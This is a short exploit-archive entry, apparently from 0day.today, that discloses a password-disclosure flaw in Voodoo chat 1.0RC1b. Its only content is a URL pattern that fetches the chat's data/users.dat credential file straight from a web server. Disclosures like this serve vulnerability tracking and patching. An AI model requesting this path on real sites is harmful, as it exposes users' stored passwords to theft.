id: 1340
date: 12/30/2006
title: Voodoo chat 1.0RC1b (users.dat) Password Disclosure Vulnerability
author: bd0rk
cves: 

=================================================================
Voodoo chat 1.0RC1b (users.dat) Password Disclosure Vulnerability
=================================================================




Affected Software: Voodoo chat 1.0RC1b

Found3R: bd0rk

Greetings:  Perle, TheJT, Shizoe

[+]Exploit: http://[yourh0st]/[voodoo_chat_dir]/data/users.dat



#  0day.today [2023-03-27]  #